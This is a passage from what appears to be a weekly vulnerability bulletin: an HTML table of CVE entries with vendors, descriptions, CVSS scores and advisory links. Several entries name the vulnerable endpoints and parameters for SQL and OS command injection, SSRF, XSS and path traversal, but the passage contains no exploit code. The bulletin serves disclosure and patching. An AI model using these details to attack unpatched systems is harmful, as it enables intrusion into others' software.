<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3488&amp;vector=CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3488" target="_blank">CVE-2024-3488</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>Server Side Request Forgery vulnerability has been discovered in OpenTextâ„¢ iManager 3.2.6.0200. This could lead to senstive information disclosure by directory traversal.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3970&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3970" target="_blank">CVE-2024-3970</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>Orchestrated--Corona Virus (COVID-19) Banner &amp; Live Data<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Orchestrated Corona Virus (COVID-19) Banner &amp; Live Data allows Stored XSS.This issue affects Corona Virus (COVID-19) Banner &amp; Live Data: from n/a through 1.8.0.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34429&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34429" target="_blank">CVE-2024-34429</a><br><a href="https://patchstack.com/database/vulnerability/corona-virus-covid-19-banner/wordpress-simple-website-banner-plugin-1-8-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>PHOENIX CONTACT--CHARX SEC-3000<br> </td>
<td>A low privileged remote attacker can use a command injection vulnerability in the API which performs remote code execution as the user-app user due to improper input validation. The confidentiality is partly affected.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28135&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28135" target="_blank">CVE-2024-28135</a><br><a href="https://cert.vde.com/en/advisories/VDE-2024-019" target="_blank">info@cert.vde.com</a></td>
</tr>
<tr>
<td>PHPGurukul--Online Course Registration System<br> </td>
<td>A vulnerability classified as critical was found in PHPGurukul Online Course Registration System 3.1. Affected by this vulnerability is an unknown functionality of the file /pincode-verification.php. The manipulation of the argument pincode leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264925 was assigned to this vulnerability.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5066&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5066" target="_blank">CVE-2024-5066</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Online%20Course%20Registration%20System/Online%20Course%20Registration%20System%20-%20SQL%20Injection%20-%204.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264925" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264925" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.336240" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>PaperCut--PaperCut NG, PaperCut MF<br> </td>
<td>An arbitrary file deletion vulnerability exists in PaperCut NG/MF that only affects Windows servers with Web Print enabled. This vulnerability requires local login/console access to the PaperCut NG/MF server (eg: member of a domain admin group).</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3037&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" target="_blank" title="CVSS V3 Score">6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3037" target="_blank">CVE-2024-3037</a><br><a href="https://www.papercut.com/kb/Main/security-bulletin-may-2024/" target="_blank">eb41dac7-0af8-4f84-9f6d-0272772514f4</a></td>
</tr>
<tr>
<td>PaperCut--PaperCut NG, PaperCut MF<br> </td>
<td>An arbitrary file creation vulnerability exists in PaperCut NG/MF that only affects Windows servers with Web Print enabled. This vulnerability requires local login/console access to the PaperCut NG/MF server (eg: member of a domain admin group).</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4712&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" target="_blank" title="CVSS V3 Score">6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4712" target="_blank">CVE-2024-4712</a><br><a href="https://www.papercut.com/kb/Main/security-bulletin-may-2024/" target="_blank">eb41dac7-0af8-4f84-9f6d-0272772514f4</a></td>
</tr>
<tr>
<td>Phil Baylog--QuickieBar<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Phil Baylog QuickieBar allows Stored XSS.This issue affects QuickieBar: from n/a through 1.8.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34425&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34425" target="_blank">CVE-2024-34425</a><br><a href="https://patchstack.com/database/vulnerability/quickiebar/wordpress-quickiebar-plugin-1-8-4-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>PluginEver--Serial Numbers for WooCommerce License Manager<br> </td>
<td>Missing Authorization vulnerability in PluginEver Serial Numbers for WooCommerce - License Manager.This issue affects Serial Numbers for WooCommerce - License Manager: from n/a through 1.7.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35173&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35173" target="_blank">CVE-2024-35173</a><br><a href="https://patchstack.com/database/vulnerability/wc-serial-numbers/wordpress-wc-serial-numbers-plugin-1-7-2-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>PrestaShop--PrestaShop<br> </td>
<td>PrestaShop is an open source e-commerce web application. In PrestaShop 8.1.5, any invoice can be downloaded from front-office in anonymous mode, by supplying a random secure_key parameter in the url. This issue is patched in version 8.1.6. No known workarounds are available.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34717&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34717" target="_blank">CVE-2024-34717</a><br><a href="https://github.com/PrestaShop/PrestaShop/releases/tag/8.1.6" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-7pjr-2rgh-fc5g" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Progress Software Corporation--WhatsUp Gold<br> </td>
<td>In WhatsUp Gold versions released before 2023.1.2 , an SSRF vulnerability exists in Whatsup Gold's Issue exists in the HTTP Monitoring functionality.  Due to the lack of proper authorization, any authenticated user can access the HTTP monitoring functionality, what leads to the Server Side Request Forgery.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4562&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4562" target="_blank">CVE-2024-4562</a><br><a href="https://community.progress.com/s/article/Announcing-WhatsUp-Gold-v2023-1-2" target="_blank">security@progress.com</a><br><a href="https://www.progress.com/network-monitoring" target="_blank">security@progress.com</a></td>
</tr>
<tr>
<td>Progress Software Corporation--WhatsUp Gold<br> </td>
<td>In WhatsUp Gold versions released before 2023.1.2 , a blind SSRF vulnerability exists in Whatsup Gold's FaviconController that allows an attacker to send arbitrary HTTP requests on behalf of the vulnerable server.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4561&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4561" target="_blank">CVE-2024-4561</a><br><a href="https://community.progress.com/s/article/Announcing-WhatsUp-Gold-v2023-1-2" target="_blank">security@progress.com</a><br><a href="https://www.progress.com/network-monitoring" target="_blank">security@progress.com</a></td>
</tr>
<tr>
<td>Progress Software--Telerik Report Server<br> </td>
<td>An information disclosure vulnerability exists in Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, allows low-privilege attacker to read systems file via XML External Entity Processing.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4357&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4357" target="_blank">CVE-2024-4357</a><br><a href="https://docs.telerik.com/report-server/knowledge-base/xxe-vulnerability-cve-2024-4357" target="_blank">security@progress.com</a></td>
</tr>
<tr>
<td>Progress Software--Telerik Report Server<br> </td>
<td>In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via a trust boundary violation vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4837&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4837" target="_blank">CVE-2024-4837</a><br><a href="https://docs.telerik.com/report-server/knowledge-base/information-exposure-cve-2024-4837" target="_blank">security@progress.com</a></td>
</tr>
<tr>
<td>Proofpoint--Enterprise Protection<br> </td>
<td>The Proofpoint Encryption endpoint of Proofpoint Enterprise Protection contains a Server-Side Request Forgery vulnerability that allows an authenticated user to relay HTTP requests from the Protection server to otherwise private network addresses.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0862&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0862" target="_blank">CVE-2024-0862</a><br><a href="https://www.proofpoint.com/us/security/security-advisories/pfpt-sa-2024-0001" target="_blank">security@proofpoint.com</a></td>
</tr>
<tr>
<td>QODE Interactive--Qi Addons For Elementor<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in QODE Interactive Qi Addons For Elementor allows PHP Local File Inclusion.This issue affects Qi Addons For Elementor: from n/a through 1.6.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47679&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47679" target="_blank">CVE-2023-47679</a><br><a href="https://patchstack.com/database/vulnerability/qi-addons-for-elementor/wordpress-qi-addons-for-elementor-plugin-1-6-3-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>RadiusTheme--ShopBuilder Elementor WooCommerce Builder Addons<br> </td>
<td>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in RadiusTheme ShopBuilder - Elementor WooCommerce Builder Addons.This issue affects ShopBuilder - Elementor WooCommerce Builder Addons: from n/a through 2.1.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34812&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34812" target="_blank">CVE-2024-34812</a><br><a href="https://patchstack.com/database/vulnerability/shopbuilder/wordpress-shopbuilder-plugin-2-1-8-sensitive-data-exposure-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>RafflePress--Giveaways and Contests<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in RafflePress Giveaways and Contests allows Functionality Bypass.This issue affects Giveaways and Contests: from n/a through 1.12.7.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32827&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32827" target="_blank">CVE-2024-32827</a><br><a href="https://patchstack.com/database/vulnerability/rafflepress/wordpress-giveaways-and-contests-by-rafflepress-plugin-1-12-7-ip-restriction-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Rashed Latif--TT Custom Post Type Creator<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rashed Latif TT Custom Post Type Creator allows Stored XSS.This issue affects TT Custom Post Type Creator: from n/a through 1.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34430&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34430" target="_blank">CVE-2024-34430</a><br><a href="https://patchstack.com/database/vulnerability/tt-custom-post-type-creator/wordpress-tt-custom-post-type-creator-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Red Hat--Red Hat Advanced Cluster Management for Kubernetes 2<br> </td>
<td>A flaw was found in the Submariner project. Due to unnecessary role-based access control permissions, a privileged attacker can run a malicious container on a node that may allow them to steal service account tokens and further compromise other nodes and potentially the entire cluster.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5042&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:H/A:N" target="_blank" title="CVSS V3 Score">6.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5042" target="_blank">CVE-2024-5042</a><br><a href="https://access.redhat.com/security/cve/CVE-2024-5042" target="_blank">secalert@redhat.com</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2280921" target="_blank">secalert@redhat.com</a><br><a href="https://github.com/advisories/GHSA-2rhx-qhxp-5jpw" target="_blank">secalert@redhat.com</a></td>
</tr>
<tr>
<td>Red Hat--Red Hat Enterprise Linux 6<br> </td>
<td>A flaw was found in the QEMU Virtio PCI Bindings (hw/virtio/virtio-pci.c). An improper release and use of the irqfd for vector 0 during the boot process leads to a guest triggerable crash via vhost_net_stop(). This flaw allows a malicious guest to crash the QEMU process on the host.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4693&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4693" target="_blank">CVE-2024-4693</a><br><a href="https://access.redhat.com/security/cve/CVE-2024-4693" target="_blank">secalert@redhat.com</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2279965" target="_blank">secalert@redhat.com</a></td>
</tr>
<tr>
<td>Red Hat--Red Hat OpenStack Platform 16.2<br> </td>
<td>An flaw was found in the OpenStack Platform (RHOSP) director, a toolset for installing and managing a complete RHOSP environment. Plaintext passwords may be stored in log files, which can expose sensitive information to anyone with access to the logs.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4840&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4840" target="_blank">CVE-2024-4840</a><br><a href="https://access.redhat.com/security/cve/CVE-2024-4840" target="_blank">secalert@redhat.com</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2280249" target="_blank">secalert@redhat.com</a></td>
</tr>
<tr>
<td>Red Hat--Red Hat Satellite 6<br> </td>
<td>A vulnerability was found in Satellite. When running a remote execution job on a host, the host's SSH key is not being checked. When the key changes, the Satellite still connects it because it uses "-o StrictHostKeyChecking=no". This flaw can lead to a man-in-the-middle attack (MITM), denial of service, leaking of secrets the remote execution job contains, or other issues that may arise from the attacker's ability to forge an SSH key. This issue does not directly allow unauthorized remote execution on the Satellite, although it can leak secrets that may lead to it.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4871&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4871" target="_blank">CVE-2024-4871</a><br><a href="https://access.redhat.com/security/cve/CVE-2024-4871" target="_blank">secalert@redhat.com</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2278627" target="_blank">secalert@redhat.com</a></td>
</tr>
<tr>
<td>Revmakx--WPCal.io Easy Meeting Scheduler<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Revmakx WPCal.Io - Easy Meeting Scheduler.This issue affects WPCal.Io - Easy Meeting Scheduler: from n/a through 0.9.5.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34816&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34816" target="_blank">CVE-2024-34816</a><br><a href="https://patchstack.com/database/vulnerability/wpcal/wordpress-wpcal-io-plugin-0-9-5-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Ruijie--RG-UAC<br> </td>
<td>A vulnerability classified as critical has been found in Ruijie RG-UAC up to 20240506. Affected is an unknown function of the file /view/networkConfig/physicalInterface/interface_commit.php. The manipulation of the argument name leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-263934 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4813&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4813" target="_blank">CVE-2024-4813</a><br><a href="https://github.com/h0e4a0r1t/I_L-HxK-pF-uZ1-/blob/main/Ruijie%20RG-UAC%20Unified%20Internet%20Behavior%20Management%20Audit%20System%20Backend%20RCE%20Vulnerability-physicalInterface%3Ainterface_commit.php.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263934" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263934" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.330020" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Ruijie--RG-UAC<br> </td>
<td>A vulnerability classified as critical was found in Ruijie RG-UAC up to 20240506. Affected by this vulnerability is an unknown functionality of the file /view/networkConfig/RouteConfig/StaticRoute/static_route_edit_commit.php. The manipulation of the argument oldipmask/oldgateway leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263935. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4814&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4814" target="_blank">CVE-2024-4814</a><br><a href="https://github.com/h0e4a0r1t/I_L-HxK-pF-uZ1-/blob/main/Ruijie%20RG-UAC%20Unified%20Internet%20Behavior%20Management%20Audit%20System%20Backend%20RCE%20Vulnerability-StaticRoute%3Astatic_route_edit_commit.php.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263935" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263935" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.330052" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Ruijie--RG-UAC<br> </td>
<td>A vulnerability, which was classified as critical, has been found in Ruijie RG-UAC up to 20240506. Affected by this issue is some unknown functionality of the file /view/bugSolve/viewData/detail.php. The manipulation of the argument filename leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263936. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4815&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4815" target="_blank">CVE-2024-4815</a><br><a href="https://github.com/h0e4a0r1t/I_L-HxK-pF-uZ1-/blob/main/Ruijie%20RG-UAC%20Unified%20Internet%20Behavior%20Management%20Audit%20System%20Backend%20RCE%20Vulnerability-view_bugSolve_viewData_detail.php.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263936" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263936" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.329966" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Ruijie--RG-UAC<br> </td>
<td>A vulnerability, which was classified as critical, was found in Ruijie RG-UAC up to 20240506. This affects an unknown part of the file /view/networkConfig/GRE/gre_add_commit.php. The manipulation of the argument name/remote/local/IP leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263937 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4816&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4816" target="_blank">CVE-2024-4816</a><br><a href="https://github.com/h0e4a0r1t/I_L-HxK-pF-uZ1-/blob/main/Ruijie%20RG-UAC%20Unified%20Internet%20Behavior%20Management%20Audit%20System%20Backend%20RCE%20Vulnerability-gre_add_commit.php.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263937" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263937" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.329953" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP BusinessObjects Business Intelligence Platform (Webservices)<br> </td>
<td>SAP Business Objects Business Intelligence Platform is vulnerable to Insecure Storage as dynamic web pages are getting cached even after logging out. On successful exploitation, the attacker can see the sensitive information through cache and can open the pages causing limited impact on Confidentiality, Integrity and Availability of the application.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33004&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33004" target="_blank">CVE-2024-33004</a><br><a href="https://me.sap.com/notes/3449093" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP Enable Now<br> </td>
<td>SAP Enable Now Manager does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. On successful exploitation, the attacker with the role 'Learner' could gain access to other user's data in manager which will lead to a high impact to the confidentiality of the application.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32730&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32730" target="_blank">CVE-2024-32730</a><br><a href="https://me.sap.com/notes/3441944" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP Global Label Management (GLM)<br> </td>
<td>SAP Global Label Management is vulnerable to SQL injection. On exploitation the attacker can use specially crafted inputs to modify database commands resulting in the retrieval of additional information persisted by the system. This could lead to low impact on Confidentiality and Integrity of the application.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33009&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33009" target="_blank">CVE-2024-33009</a><br><a href="https://me.sap.com/notes/1938764" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP My Travel Requests <br> </td>
<td>SAP My Travel Requests does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. On successful exploitation, the attacker can upload a malicious attachment to a business trip request which will lead to a low impact on the confidentiality, integrity and availability of the application. </td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32731&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32731" target="_blank">CVE-2024-32731</a><br><a href="https://me.sap.com/notes/3447467" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP NetWeaver Application Server ABAP and ABAP Platform <br> </td>
<td>Due to missing input validation and output encoding of untrusted data, SAP NetWeaver Application Server ABAP and ABAP Platform allows an unauthenticated attacker to inject malicious JavaScript code into the dynamically crafted web page. On successful exploitation the attacker can access or modify sensitive information with no impact on availability of the application</td>
<td>2024-05-14</td>
